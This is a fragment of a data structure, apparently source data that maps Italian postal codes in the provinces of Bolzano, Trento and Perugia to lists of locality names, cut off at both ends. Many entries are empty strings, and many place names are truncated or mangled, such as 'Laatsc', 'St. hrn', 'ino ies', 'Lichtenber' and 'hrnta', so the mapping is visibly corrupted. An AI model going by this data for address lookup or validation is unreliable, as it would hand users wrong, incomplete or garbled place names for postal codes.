["Aschbach", "BZ"], ["Plars", "BZ"], ["Lagundo", "BZ"], ["Algund", "BZ"], ], "39023": [ ["Laas", "BZ"], ["Lasa", "BZ"], ["Allitz", "BZ"], ["Tana", "BZ"], ["Tarnell", "BZ"], ["Eyr", "BZ"], ["Tanas", "BZ"], ["Tschengel", "BZ"], ["Cengles", "BZ"], ["Oris", "BZ"], ], "39024": [ ["Laatsc", "BZ"], ["Marienberg", "BZ"], ["Planol", "BZ"], ["Planei", "BZ"], ["Tartsc", "BZ"], ["Schleis", "BZ"], ["Matsc", "BZ"], ["Mazia", "BZ"], ["Laudes", "BZ"], ["Burgusio", "BZ"], ["Schlinig", "BZ"], ["Burgeis", "BZ"], ["Tarces", "BZ"], ["", "BZ"], ["Mals", "BZ"], ], "39025": [["Plaus", "BZ"], ["Stabe", "BZ"], ["Stava", "BZ"], ["Naturno", "BZ"], ["Naturns", "BZ"]], "39026": [ ["Agums", "BZ"], ["Montechiaro", "BZ"], ["Prad", "BZ"], ["Lichtenber", "BZ"], ["", "BZ"], ], "39027": [["Resia", "BZ"], ["Reschen", "BZ"], ["", "BZ"], ["", "BZ"]], "39028": [ ["Silandro", "BZ"], ["Covelano", "BZ"], ["Vezzano", "BZ"], ["Schlanders", "BZ"], ["Talatsch", "BZ"], ["Vezzan", "BZ"], ["Goefla", "BZ"], ["Kortsch", "BZ"], ["Göflan", "BZ"], ], "39029": [ ["Trafo", "BZ"], ["Gomago", "BZ"], ["Stelvio", "BZ"], ["Sulden", "BZ"], ["Solda", "BZ"], ["Trafoi", "BZ"], ["Gomagoi", "BZ"], ], "39030": [ ["", "BZ"], ["St. Sigmund", "BZ"], ["Vallarga", "BZ"], ["", "BZ"], ["Niederolang", "BZ"], ["", "BZ"], ["Casteldarne", "BZ"], ["", "BZ"], ["Mühlen/Pfalzen", "BZ"], ["St.", "BZ"], ["", "BZ"], ["Obervintl", "BZ"], ["Zwischenwasser", "BZ"], ["Steinhaus", "BZ"], ["Enneberg/Mareo", "BZ"], [" in Ahrn", "BZ"], ["St. Veit in Prags", "BZ"], ["Chienes", "BZ"], ["Kiens", "BZ"], ["Issing", "BZ"], ["", "BZ"], ["Pflaurenz", "BZ"], ["Oberolang", "BZ"], ["Greinwalden", "BZ"], ["Kampill", "BZ"], ["Untergsies", "BZ"], ["St. ", "BZ"], ["Pichl", "BZ"], ["Untermoi", "BZ"], ["Margen", "BZ"], ["Saalen", "BZ"], ["Onach", "BZ"], ["Gais", "BZ"], ["Kasern", "BZ"], ["St. Johann in Ahrn", "BZ"], ["St.Vigi", "BZ"], ["Ahrntal", "BZ"], ["Oberrasen", "BZ"], ["Niederrasen", "BZ"], ["St. hrn", "BZ"], ["Percha", "BZ"], ["Vandoies", "BZ"], ["Campil", "BZ"], ["", "BZ"], ["Mitterolang", "BZ"], ["Hofern", "BZ"], ["", "BZ"], ["Nasen", "BZ"], ["Untervintl", "BZ"], ["Ahornach", "BZ"], ["Pikolein", "BZ"], ["Perca", "BZ"], ["Montal", "BZ"], ["", "BZ"], ["Kolfuschg", "BZ"], [" In Valle Aurina", "BZ"], ["", "BZ"], ["St.Johann In Ahrnta", "BZ"], ["St.Magdalen", "BZ"], ["St. Martin in Thurn/S. 
", "BZ"], ["Longiaru'", "BZ"], [" In Valle Aurina", "BZ"], ["hrnta", "BZ"], ["St.Sigmun", "BZ"], ["Moo", "BZ"], ["Weitental", "BZ"], ["Pedero", "BZ"], ["Ehrenburg", "BZ"], ["Ellen", "BZ"], ["St. Magdalena i. G.", "BZ"], ["Wengen/", "BZ"], ["Oberwielenbach", "BZ"], ["", "BZ"], ["Wielenberg", "BZ"], ["", "BZ"], ["", "BZ"], ["", "BZ"], ["Stefansdorf", "BZ"], ["Kurfar", "BZ"], ["Longega", "BZ"], ["Weißenbach", "BZ"], ["San Vigilio", "BZ"], ["Geiselsberg", "BZ"], ["", "BZ"], ["Tesselberg", "BZ"], ["Niedervintl", "BZ"], ["", "BZ"], ["Vintl", "BZ"], ["Prettau", "BZ"], ["Terenten", "BZ"], ["Welschellen", "BZ"], ["", "BZ"], ["Terento", "BZ"], ["Lappach", "BZ"], ["Piccolino", "BZ"], ["Rodeneck", "BZ"], ["Sexten", "BZ"], ["Sesto", "BZ"], ["Cadipietra", "BZ"], ["Pfalzen", "BZ"], ["Falzes", "BZ"], ["Pfunders", "BZ"], ["Rein", "BZ"], ["ino ies", "BZ"], ["Uttenheim", "BZ"], ["", "BZ"], ["Mühlwald", "BZ"], ["Fundres", "BZ"], ["Predoi", "BZ"], ["Prags", "BZ"], ["Braies", "BZ"], ["", "BZ"], ["", "BZ"], ["Unterplanken", "BZ"], ["", "BZ"], ["Platten", "BZ"], ["Olang", "BZ"], ["Valdaora", "BZ"], ["Luttach", "BZ"], ["Antholz", "BZ"], ["San Martino ia", "BZ"], ["Lutago", "BZ"], ["Pederoa", "BZ"], ["Marebbe", "BZ"], ["", "BZ"], ], "39031": [ ["Luns", "BZ"], ["Bruneck", "BZ"], ["Riscone", "BZ"], ["Reischach", "BZ"], ["Aufhofen", "BZ"], ["Teodone", "BZ"], ["Dietenheim", "BZ"], ["Stegen", "BZ"], ["Brunico", "BZ"], ["", "BZ"], ], "39032": [ ["Kematen", "BZ"], ["", "BZ"], ["Ahornac", "BZ"], ["", "BZ"], ["Taufers/Ahrntal", "BZ"], ["", "BZ"], ["Sand ", "BZ"], ["", "BZ"], ["Acereto", "BZ"], ["", "BZ"], ], "39033": [["Kolfusch", "BZ"], ["Colfosco", "BZ"], ["", "BZ"], ["Corvara", "BZ"]], "39034": [["Toblach", "BZ"], ["Dobbiaco", "BZ"], ["Aufkirchen", "BZ"], ["Wahlen", "BZ"]], "39035": [["Monguelfo", "BZ"], ["Taisten", "BZ"], ["Tesido", "BZ"], ["Welsberg", "BZ"]], "39036": [ ["", "BZ"], ["", "BZ"], ["Stern", "BZ"], ["Pedraces", "BZ"], ["Badia", "BZ"], ["Abtei/Badia", "BZ"], ["", "BZ"], ["Pedrace", "BZ"], ], "39037": [ ["Mühlbach", "BZ"], ["Vals", "BZ"], ["Meransen", "BZ"], ["Spinges", "BZ"], ["Rodengo", "BZ"], ["", "BZ"], ], "39038": [["Vierschach", "BZ"], ["Winnebach", "BZ"], ["", "BZ"]], "39039": [["Villabassa", "BZ"], ["Niederdorf", "BZ"]], "39040": [ ["Stilves", "BZ"], ["Penon", "BZ"], ["Kastelruth", "BZ"], ["Proves", "BZ"], ["Campodazzo", "BZ"], ["Mauls", "BZ"], ["Villandro", "BZ"], ["", "BZ"], ["Lajen", "BZ"], ["Mareta", "BZ"], ["", "BZ"], ["Siusi", "BZ"], ["Ridanna", "BZ"], ["Barbiano", "BZ"], ["Petersberg", "BZ"], ["Olmi", "BZ"], ["Casateia", "BZ"], ["Tramin", "BZ"], ["Stanghe", "BZ"], ["", "BZ"], ["Neustift", "BZ"], ["Ratschings", "BZ"], ["Laion", "BZ"], ["Cauria", "BZ"], ["Novacella", "BZ"], ["Varna", "BZ"], ["Rasa", "BZ"], ["Salorno", "BZ"], ["", "BZ"], ["Ridnaun", "BZ"], ["Auer", "BZ"], ["Ora", "BZ"], ["Pfitsch", "BZ"], ["Aldino", "BZ"], ["Laag", "BZ"], ["", "BZ"], ["Racines", "BZ"], ["Salurn", "BZ"], ["Mareit", "BZ"], ["Villanders", "BZ"], ["Sciaves", "BZ"], ["Luson", "BZ"], ["Vahrn", "BZ"], ["Mühlen/Truden", "BZ"], ["Tanürz", "BZ"], ["Villnöß", "BZ"], ["Proveis", "BZ"], ["Pfulters", "BZ"], ["Söll", "BZ"], ["Pflersch", "BZ"], ["/Kastelr.", "BZ"], ["Graun/Unterl.", "BZ"], ["Lüsen", "BZ"], ["Flitt", "BZ"], ["Garn", "BZ"], ["Buchholz", "BZ"], ["Entiklar", "BZ"], ["Schmuders", "BZ"], ["Kollmann", "BZ"], ["Montan", "BZ"], ["Hohlen", "BZ"], ["Albions", "BZ"], ["Castelrotto", "BZ"], ["", "BZ"], ["Pruno", "BZ"], ["Feldthurns", "BZ"], ["St.", "BZ"], ["", "BZ"], ["Velturno", "BZ"], ["Gastei", "BZ"], ["Trodena", "BZ"], 
["Magre' Sulla Strada Del Vino", "BZ"], ["Redagno", "BZ"], ["Laurein", "BZ"], ["Mules", "BZ"], ["Lauregno", "BZ"], ["", "BZ"], ["Raa", "BZ"], ["Radein", "BZ"], ["", "BZ"], ["", "BZ"], ["Atzwang", "BZ"], ["Truden", "BZ"], ["St.Lugan", "BZ"], ["Natz", "BZ"], ["Stilfes", "BZ"], ["Gfrill/Unterland", "BZ"], ["Funes", "BZ"], ["Fontanefredde", "BZ"], ["Schabs", "BZ"], ["Elzenbaum", "BZ"], ["", "BZ"], ["Valgiovo", "BZ"], ["", "BZ"], ["Termeno Sulla Strada Del Vino", "BZ"], ["Kurtinig", "BZ"], ["Waidbruck", "BZ"], ["Jaufental", "BZ"], ["Hole", "BZ"], ["Cortaccia Sulla Strada Del Vino", "BZ"], ["St.Pete", "BZ"], ["Altrei", "BZ"], ["Stange", "BZ"], ["Kaltenbrunn", "BZ"], ["Anterivo", "BZ"], ["Naz", "BZ"], ["Kurtatsch", "BZ"], ["Tschövas", "BZ"], ["Gschnon", "BZ"], ["Aldein", "BZ"], ["Klerant", "BZ"], ["Weißenstein", "BZ"], ["", "BZ"], ["Innerpfitsch", "BZ"], ["Margreid", "BZ"], ["Schnauders", "BZ"], ["Fennberg", "BZ"], ["Tagusens", "BZ"], ["Flans", "BZ"], ["Pinzon", "BZ"], ["", "BZ"], ["", "BZ"], ["Afers", "BZ"], ["Montagna", "BZ"], ["Freins", "BZ"], ["Rungg", "BZ"], ["", "BZ"], ["Trens", "BZ"], ["Telfes", "BZ"], ["Spiluck", "BZ"], ["St. ", "BZ"], ["Schrambach", "BZ"], ["Gossensaß", "BZ"], ["St. ", "BZ"], ["", "BZ"], ["Freienfeld", "BZ"], ["Barbian", "BZ"], ["Glen", "BZ"], ["", "BZ"], ["Viums", "BZ"], ["Schalders", "BZ"], ], "39041": [["Gossensas", "BZ"], ["Brennero", "BZ"], ["Brenner", "BZ"], ["", "BZ"]], "39042": [ ["", "BZ"], ["Albes", "BZ"], ["Neustift", "BZ"], ["Brixen", "BZ"], ["Eores", "BZ"], ["St.Andr", "BZ"], ["Sarns", "BZ"], ["Albeins", "BZ"], ["Zinggen", "BZ"], ["Afer", "BZ"], ["Pinzagen", "BZ"], ["Bressanone", "BZ"], ["Tschötsch", "BZ"], ["Mellaun", "BZ"], ["Elvas", "BZ"], ["Milland", "BZ"], ["Karnol", "BZ"], ["Tils", "BZ"], ], "39043": [ ["Teis", "BZ"], ["Verdings", "BZ"], ["Latzfons", "BZ"], ["Gufidaun", "BZ"], ["Gudon", "BZ"], ["Chiusa", "BZ"], ["Klausen", "BZ"], ["Lazfons", "BZ"], ], "39044": [["Laghetti", "BZ"], ["Mazon", "BZ"], ["Neumarkt", "BZ"], ["Egna", "BZ"]], "39045": [ ["Oberau", "BZ"], ["Mittewald", "BZ"], ["Grasstein", "BZ"], ["Fortezza", "BZ"], ["Franzensfeste", "BZ"], ], "39046": [["St. Ulrich/Urtijei", "BZ"], ["Ortisei", "BZ"], ["Pufels", "BZ"], ["St. Jakob", "BZ"]], "39047": [["", "BZ"], ["St. Christina/S. Crestina -Gherdeina", "BZ"]], "39048": [["", "BZ"], ["Selva", "BZ"], ["Wolkenstein/Selva", "BZ"]], "39049": [ ["Flains", "BZ"], ["Steckholz", "BZ"], ["Thuins", "BZ"], ["Kematen/Pfitsch", "BZ"], ["", "BZ"], ["Bahnho", "BZ"], ["Tschöfs", "BZ"], ["Prati", "BZ"], ["Wiesen", "BZ"], ["Sterzing", "BZ"], ["Ried", "BZ"], ["Vipiteno", "BZ"], ["Stazione", "BZ"], ], "39050": [ ["Valas", "BZ"], ["Völs am Schlern", "BZ"], ["", "BZ"], ["Prösels", "BZ"], ["Oberinn", "BZ"], ["Breien", "BZ"], ["Gummer", "BZ"], ["Eggen", "BZ"], ["Steinmannwald", "BZ"], ["Unterrain/Eppan", "BZ"], ["St. Justina/Eppan", "BZ"], ["St. ", "BZ"], ["Missian", "BZ"], ["San Nicolo' D'Ega", "BZ"], ["Wangen", "BZ"], ["Jenesien", "BZ"], ["Lengstein", "BZ"], ["Seit", "BZ"], ["", "BZ"], ["Ums", "BZ"], ["Perdonig", "BZ"], ["/Bozen", "BZ"], ["Tiers", "BZ"], ["Karneid", "BZ"], ["Steinegg", "BZ"], ["Birchabruck", "BZ"], ["", "BZ"], ["Flaas", "BZ"], ["Blumau", "BZ"], ["Raut", "BZ"], ["", "BZ"], ["Untereggen", "BZ"], ["", "BZ"], ["Innichen", "BZ"], ["San Paolo", "BZ"], ["Afing", "BZ"], ["Unterglaning", "BZ"], ["Girlan", "BZ"], ["", "BZ"], ["St.Pauls", "BZ"], ["Unterinn", "BZ"], ["St. 
Pauls/Eppan", "BZ"], ["", "BZ"], ["Petersberg", "BZ"], ["Deutschnofen", "BZ"], ["", "BZ"], ["Avigna", "BZ"], ["'", "BZ"], ["Tires", "BZ"], ], "39051": [["Branzoll", "BZ"], ["Bronzolo", "BZ"], ["Pfatten", "BZ"], ["Vadena", "BZ"]], "39052": [ ["", "BZ"], ["St. Nikolaus/Kaltern", "BZ"], ["Oberplanitzing", "BZ"], ["", "BZ"], ["Mitterdorf", "BZ"], ["Altenburg", "BZ"], ["Unterplanitzing", "BZ"], ["Kaltern", "BZ"], ["", "BZ"], ], "39053": [ ["Kardaun", "BZ"], ["Collepietra", "BZ"], ["", "BZ"], ["San Valento", "BZ"], ["", "BZ"], ["Eggenta", "BZ"], ["", "BZ"], ["Cardano", "BZ"], ["Kardaun/Bozen", "BZ"], ["Steineg", "BZ"], ["Bluma", "BZ"], ["Gumme", "BZ"], ], "39054": [ ["Gissmann", "BZ"], ["Unterin", "BZ"], ["", "BZ"], ["Wange", "BZ"], ["Collalbo", "BZ"], ["Lengmoos", "BZ"], ["", "BZ"], ["Oberi", "BZ"], ["", "BZ"], ["Oberboze", "BZ"], ["Ritten", "BZ"], ["", "BZ"], ["Renon", "BZ"], ["Vanga", "BZ"], ["Klobenstein", "BZ"], ["Soprabolzano", "BZ"], ], "39055": [ ["Laives", "BZ"], ["", "BZ"], ["", "BZ"], ["Leifers", "BZ"], ["", "BZ"], [" Di Laives", "BZ"], ["", "BZ"], ["Pineta", "BZ"], ["St.", "BZ"], ], "39056": [ ["", "BZ"], ["Karersee", "BZ"], ["Carezza", "BZ"], ["Welschnofen", "BZ"], ["", "BZ"], ], "39057": [ ["Cornaiano", "BZ"], ["", "BZ"], ["Girla", "BZ"], ["Eppan", "BZ"], ["", "BZ"], ["", "BZ"], ["Montiggl", "BZ"], ["Frangar", "BZ"], ["/Eppan", "BZ"], ["Frangarto", "BZ"], ], "39058": [ ["Pens", "BZ"], ["Nordhei", "BZ"], ["Sarentino", "BZ"], ["Asten", "BZ"], ["Riedelsberg", "BZ"], ["Bundschen", "BZ"], ["Weißenbach/Sarntal", "BZ"], ["Reinswald", "BZ"], ["Durnholz", "BZ"], ["Villa", "BZ"], ["Astfeld-Nordheim", "BZ"], ["Sarnthein", "BZ"], ["Campolasta", "BZ"], ["Aberstückl", "BZ"], ], "39059": [["Wolfsgruben", "BZ"], ["Oberbozen", "BZ"]], "39100": [ ["Kampenn", "BZ"], ["Glaning", "BZ"], ["Sigmundskro", "BZ"], ["Castelfirmiano", "BZ"], ["Oberau/Bozen", "BZ"], ["Signat", "BZ"], ["Rentsch", "BZ"], ["Bozen", "BZ"], ["Bolzano", "BZ"], ], "38010": [ ["Faedo", "TN"], ["Campodenno", "TN"], ["Spormaggiore", "TN"], ["Malgolo", "TN"], ["Cavedago", "TN"], ["Sporminore", "TN"], ["Ronzone", "TN"], ["Denno", "TN"], ["Dambel", "TN"], ["", "TN"], ["Andalo", "TN"], ["", "TN"], ["Casez", "TN"], ["", "TN"], ["Sanzeno", "TN"], ["", "TN"], ["Banco", "TN"], ["Ruffre'", "TN"], ["Ton", "TN"], ["Sfruz", "TN"], ["Romeno", "TN"], ["", "TN"], ["", "TN"], ["Tavon", "TN"], ], "38011": [["Seio", "TN"], ["Amblar", "TN"], ["Don", "TN"], ["Sarnonico", "TN"], ["Cavareno", "TN"]], "38012": [ ["Segno", "TN"], ["Coredo", "TN"], ["Vervò", "TN"], ["Smarano", "TN"], ["Predaia", "TN"], ["Tres", "TN"], ["Dermulo", "TN"], ["Mollaro", "TN"], ["Taio", "TN"], ], "38013": [["Tret", "TN"], ["Malosco", "TN"], ["Vasio", "TN"], ["Fondo", "TN"]], "38015": [["Lavis", "TN"], ["", "TN"], ["Pressano", "TN"]], "38016": [["Mezzocorona", "TN"]], "38017": [["Mezzolombardo", "TN"]], "38018": [["Molveno", "TN"]], "38019": [["Tassullo", "TN"], ["Tuenno", "TN"], ["Nanno", "TN"]], "38020": [ ["Deggiano", "TN"], ["Mocenigo", "TN"], ["Pellizzano", "TN"], ["Cloz", "TN"], ["Commezzadura", "TN"], ["Bresimo", "TN"], ["Rabbi", "TN"], ["Rumo", "TN"], ["Marcena", "TN"], ["Castelfondo", "TN"], ["Mestriago", "TN"], ["Mezzana", "TN"], ["Pracorno", "TN"], ["Cis", "TN"], ], "38021": [["Brez", "TN"]], "38022": [["Cavizzana", "TN"], ["Caldes", "TN"], ["Bozzana", "TN"]], "38023": [["Mechel", "TN"], ["Caltron", "TN"], ["Cles", "TN"]], "38024": [ ["Cogolo", "TN"], ["", "TN"], ["Celledizzo", "TN"], ["Celedizzo", "TN"], ["Peio", "TN"], ], "38025": [["Monclassico", "TN"], ["Dimaro", 
"TN"]], "38026": [["", "TN"], ["Ossana", "TN"], ["Cusiano", "TN"], ["Fucine", "TN"]], "38027": [["Male'", "TN"], ["Terzolas", "TN"], ["Croviana", "TN"]], "38028": [["Tregiovo", "TN"], ["Romallo", "TN"], ["Revo'", "TN"], ["Cagno'", "TN"]], "38029": [["", "TN"], ["Fraviano", "TN"], ["Vermiglio", "TN"]], "38030": [ ["Soraga", "TN"], ["Daiano", "TN"], ["Molina", "TN"], ["", "TN"], ["Varena", "TN"], ["", "TN"], ["Stramentizzo", "TN"], ["Capriana", "TN"], ["", "TN"], ["Giovo", "TN"], ["Panchia'", "TN"], ["", "TN"], ["Palu'", "TN"], ["Stramentizzo Nuovo", "TN"], ["Verla", "TN"], ["", "TN"], ["Campestrin", "TN"], ["Mazzin", "TN"], ], "38031": [["", "TN"]], "38032": [["", "TN"], ["", "TN"], ["Penia", "TN"], ["Canazei", "TN"]], "38033": [["Carano", "TN"], ["Cavalese", "TN"], ["", "TN"]], "38034": [["Lisignago", "TN"], ["Cembra", "TN"]], "38035": [["", "TN"], ["Moena", "TN"], ["Forno", "TN"]], "38036": [["Pera", "TN"], ["", "TN"], ["Pozza Di Fassa", "TN"]], "38037": [["Paneveggio", "TN"], ["Predazzo", "TN"], ["", "TN"], ["Bellamonte", "TN"]], "38038": [["Tesero", "TN"]], "38039": [["", "TN"], ["Costalunga", "TN"], ["", "TN"]], "38040": [ ["Fornace", "TN"], ["Lases", "TN"], ["Valfloriana", "TN"], ["Lona Lases", "TN"], ["Ravina", "TN"], ["Luserna", "TN"], ["Lona", "TN"], ], "38041": [["Albiano", "TN"]], "38042": [ ["Campolongo", "TN"], ["'", "TN"], ["Faida", "TN"], ["Rizzolaga", "TN"], ["'", "TN"], ["Montagnaga", "TN"], ["San Mauro", "TN"], ], "38043": [["Regnana", "TN"], ["Bedollo", "TN"], ["Brusago", "TN"]], "38045": [["Civezzano", "TN"], ["Seregnano", "TN"]], "38046": [["Gionghi", "TN"], ["", "TN"], ["Lavarone", "TN"], ["Cappella", "TN"]], "38047": [["Valcava", "TN"], ["Sevignano", "TN"], ["Quaras", "TN"], ["Segonzano", "TN"]], "38048": [["Sover", "TN"]], "38049": [ ["", "TN"], ["Bosentino", "TN"], ["Centa San Nicolo'", "TN"], ["Vattaro", "TN"], ["Migazzone", "TN"], ], "38050": [ ["", "TN"], ["Ospedaletto", "TN"], ["Torcegno", "TN"], ["", "TN"], ["Fierozzo", "TN"], ["Marter", "TN"], ["Prade", "TN"], ["Tenna", "TN"], ["", "TN"], ["Bieno", "TN"], ["", "TN"], ["Carzano", "TN"], ["", "TN"], ["", "TN"], ["", "TN"], ["", "TN"], ["", "TN"], ["Imer", "TN"], ["Castelnuovo", "TN"], ["Novaledo", "TN"], ["Scurelle", "TN"], ["Gobbera", "TN"], ["", "TN"], ["Mezzano", "TN"], ["", "TN"], ["Caoria", "TN"], ["Frassilongo", "TN"], ["", "TN"], ["Telve", "TN"], ["", "TN"], ["Roncegno", "TN"], ], "38051": [["", "TN"], ["Borgo", "TN"], ["Olle", "TN"]], "38052": [["Caldonazzo", "TN"]], "38053": [["", "TN"]], "38054": [ ["Siror", "TN"], ["", "TN"], ["Transacqua", "TN"], ["", "TN"], ["Tonadico", "TN"], ], "38055": [ ["Tezze", "TN"], ["", "TN"], ["", "TN"], ["Selva", "TN"], ["Grigno", "TN"], ], "38056": [["Barco", "TN"], ["", "TN"]], "38057": [ ["", "TN"], ["Vignola", "TN"], ["Falesina", "TN"], ["Costasavina", "TN"], ["Susa'", "TN"], ["Canezza", "TN"], ["", "TN"], ["Viarago", "TN"], ["Roncogno", "TN"], ["Canale", "TN"], ["", "TN"], ["Serso", "TN"], ["Vigalzano", "TN"], ["", "TN"], ["", "TN"], ["Canzolino", "TN"], ["Madrano", "TN"], ], "38059": [ ["", "TN"], ["", "TN"], ["Strigno", "TN"], ["Spera", "TN"], ["Samone", "TN"], ["Agnedo", "TN"], ], "38060": [ ["Tenno", "TN"], ["", "TN"], ["Valmorbia", "TN"], ["Corte", "TN"], ["Ronzo", "TN"], ["", "TN"], ["", "TN"], ["Castellano", "TN"], ["", "TN"], ["Chienis", "TN"], ["Pedersano", "TN"], ["", "TN"], ["Castione", "TN"], ["", "TN"], ["Anghebeni", "TN"], ["Pregasina", "TN"], ["", "TN"], ["Cimone", "TN"], ["Isera", "TN"], ["Nogaredo", "TN"], ["Besenello", "TN"], ["Cornale'", "TN"], 
["Valduga", "TN"], ["", "TN"], ["Bezzecca", "TN"], ["", "TN"], ["", "TN"], ["Nomi", "TN"], ["Cologna", "TN"], ["Brentonico", "TN"], ["Volano", "TN"], ["Terragnolo", "TN"], ["Raossi", "TN"], ["", "TN"], ["Romagnano", "TN"], ["Concei", "TN"], ["Aldeno", "TN"], ["Vallarsa", "TN"], ["Crosano", "TN"], ["Pomarolo", "TN"], ], "38061": [ ["", "TN"], ["Pilcante", "TN"], ["", "TN"], ["Ala", "TN"], ["Chizzola", "TN"], ["Serravalle", "TN"], ["", "TN"], ], "38062": [["Oltresarca", "TN"], ["Arco", "TN"], ["Bolognano", "TN"], ["", "TN"], ["Vignole", "TN"]], "38063": [["Sabbionara", "TN"], ["", "TN"], ["Avio", "TN"]], "38064": [ ["", "TN"], ["Folgaria", "TN"], ["Mezzomonte", "TN"], ["Nosellari", "TN"], ["", "TN"], ["Serrada", "TN"], ["Serrada Di Folgaria", "TN"], ["", "TN"], ["Carbonare", "TN"], ["Mezzomonte Di Sopra", "TN"], ], "38065": [ ["Manzano", "TN"], ["Besagno", "TN"], ["Sano", "TN"], ["", "TN"], ["Mori", "TN"], ["Pannone", "TN"], ], "38066": [["Varone", "TN"], ["", "TN"]], "38067": [["Mezzolago", "TN"], ["", "TN"], ["Ledro", "TN"]], "38068": [ ["Rovereto", "TN"], ["", "TN"], ["", "TN"], ["Trambileno", "TN"], ["Lizzanella", "TN"], ["Marco", "TN"], ], "38069": [["", "TN"], ["Torbole", "TN"], ["Nago", "TN"]], "38070": [["Tavodo", "TN"], ["", "TN"], ["Lomaso", "TN"], ["Stenico", "TN"]], "38071": [ ["Larido", "TN"], ["Marazzone", "TN"], ["", "TN"], ["", "TN"], ["Bivedo", "TN"], ], "38073": [["Vigo", "TN"], ["", "TN"], ["Stravino", "TN"], ["Cavedine", "TN"]], "38074": [["Drena", "TN"], ["Ceniga", "TN"], ["Dro", "TN"], ["Pietramurata", "TN"]], "38075": [["Ballino", "TN"], ["Fiave'", "TN"]], "38076": [ ["", "TN"], ["Calavino", "TN"], ["Lasino", "TN"], ["Sarche", "TN"], ["Madruzzo", "TN"], ], "38077": [ ["", "TN"], ["", "TN"], ["Lundo", "TN"], ["", "TN"], ["", "TN"], ], "38078": [ ["Dorsino", "TN"], ["Moline", "TN"], ["", "TN"], ["", "TN"], ["", "TN"], ], "38079": [["Bolbeno", "TN"], ["Zuclo", "TN"], ["", "TN"], ["Pelugo", "TN"], ["Saone", "TN"]], "38080": [ ["Baitoni", "TN"], ["Carisolo", "TN"], ["Bocenago", "TN"], ["Bondone", "TN"], ["Strembo", "TN"], ["", "TN"], ["Caderzone", "TN"], ], "38082": [["", "TN"]], "38083": [["Condino", "TN"], ["Brione", "TN"], ["Cimego", "TN"]], "38085": [["", "TN"], ["Creto", "TN"], ["Prezzo", "TN"]], "38086": [ ["Massimeno", "TN"], ["", "TN"], ["Pinzolo", "TN"], ["", "TN"], ["Giustino", "TN"], ], "38087": [["Bondo", "TN"], ["Lardaro", "TN"], ["Roncone", "TN"], ["Breguzzo", "TN"]], "38088": [["", "TN"], ["Spiazzo", "TN"]], "38089": [["Storo", "TN"], ["Darzo", "TN"], ["Lodrone", "TN"]], "38091": [["Praso", "TN"], ["Bersone", "TN"], ["Valdaone", "TN"], ["Daone", "TN"]], "38092": [["Grauno", "TN"], ["Grumes", "TN"], ["Valda", "TN"], ["Faver", "TN"]], "38093": [["Terres", "TN"], ["Flavon", "TN"], ["Cunevo", "TN"]], "38094": [ ["Verdesina", "TN"], ["", "TN"], ["", "TN"], ["Iavre'", "TN"], ["Dare'", "TN"], ], "38095": [["Ragoli", "TN"], ["Montagne", "TN"], ["Preore", "TN"]], "38096": [["Vezzano", "TN"], ["Terlago", "TN"], ["Margone", "TN"], ["Ranzo", "TN"], ["Padergnone", "TN"]], "38097": [["Zambana", "TN"], ["", "TN"]], "38100": [ ["", "TN"], ["Trento", "TN"], ["Gardolo", "TN"], ["Sopramonte", "TN"], ["", "TN"], ["", "TN"], ["Cadine", "TN"], ["Cognola", "TN"], ["Sardagna", "TN"], ["Vaneze", "TN"], ["Martignano", "TN"], ["", "TN"], ["", "TN"], ["Valsorda", "TN"], ["Villamontagna", "TN"], ["Meano", "TN"], ["", "TN"], ["Vela", "TN"], ["Villazzano", "TN"], ["Montevaccino", "TN"], ["Povo", "TN"], ["Mattarello", "TN"], ], "38121": [["Trento", "TN"]], "06010": [["Citerna", "PG"], ["", 
"PG"], ["Lippiano", "PG"], ["Fighille", "PG"]], "06012": [ ["Riosecco", "PG"], ["Muccignano", "PG"], ["Cinquemiglia", "PG"], ["Morra", "PG"], ["Piosina", "PG"], ["Cerbara", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["Lerchi", "PG"], ["Promano", "PG"], ["Fraccano", "PG"], ], "06014": [["Montone", "PG"]], "06016": [["Selci", "PG"], ["", "PG"], ["Lama", "PG"]], "06018": [ ["Pistrino", "PG"], ["Petroia", "PG"], ["Lugnano", "PG"], ["", "PG"], ["", "PG"], ["Petrelle", "PG"], ["Trestina", "PG"], ["", "PG"], ], "06019": [ ["Verna", "PG"], ["", "PG"], ["Preggio", "PG"], ["Calzolaro", "PG"], ["Montecastelli", "PG"], ["Pierantonio", "PG"], ["Niccone", "PG"], ["Umbertide", "PG"], ], "06020": [["Branca", "PG"], ["", "PG"]], "06021": [["Costacciaro", "PG"], ["", "PG"], ["", "PG"]], "06022": [ ["", "PG"], ["Purello", "PG"], ["", "PG"], ["", "PG"], ], "06023": [ ["", "PG"], ["", "PG"], ["", "PG"], ["Cerqueto", "PG"], ["Morano", "PG"], ["", "PG"], ["", "PG"], ], "06024": [ ["Gubbio", "PG"], ["Mocaiana", "PG"], ["", "PG"], ["Stazione Di Padule", "PG"], ["", "PG"], ["", "PG"], ["Scritto", "PG"], ["Padule", "PG"], ["Caicambiucci", "PG"], ["Semonte", "PG"], ["", "PG"], ["Colpalombo", "PG"], ["Casamorcia", "PG"], ["Cipolleto", "PG"], ["Camporeggiano", "PG"], ], "06025": [["Gaifana", "PG"], ["", "PG"], ["Molinaccio", "PG"]], "06026": [["Pietralunga", "PG"]], "06027": [["", "PG"], ["Scheggia", "PG"], ["", "PG"], ["Pascelupo", "PG"]], "06028": [["Sigillo", "PG"]], "06029": [["", "PG"], ["Valfabbrica", "PG"]], "06030": [ ["", "PG"], ["Cammoro", "PG"], ["Sellano", "PG"], ["", "PG"], ["Valtopina", "PG"], ["Bastardo", "PG"], ], "06031": [["Bevagna", "PG"], ["Cantalupo", "PG"]], "06033": [["Cannara", "PG"]], "06034": [ ["Scafali", "PG"], ["Sant'Eraclio", "PG"], ["Annifo", "PG"], ["Foligno", "PG"], ["Capodacqua", "PG"], ["Fiamenga", "PG"], ["Rasiglia", "PG"], ["Casenove", "PG"], ["Verchiano", "PG"], ["Scopoli", "PG"], ["Colfiorito", "PG"], ["Uppello", "PG"], ["", "PG"], ["Scanzano", "PG"], ["Sterpete", "PG"], ["Pale", "PG"], ["Perticani", "PG"], ["", "PG"], ["Belfiore", "PG"], ], "06035": [ ["", "PG"], ["Collesecco", "PG"], ["", "PG"], ["Pozzo", "PG"], ["", "PG"], ["Marcellano", "PG"], ], "06036": [["Montefalco", "PG"], ["", "PG"], ["", "PG"]], "06038": [["Spello", "PG"], ["Capitan Loreto", "PG"]], "06039": [ ["Trevi", "PG"], ["Cannaiola", "PG"], ["", "PG"], ["Matigge", "PG"], ["", "PG"], ["", "PG"], ], "06040": [ ["Piedipaterno", "PG"], ["", "PG"], ["Ceselli", "PG"], 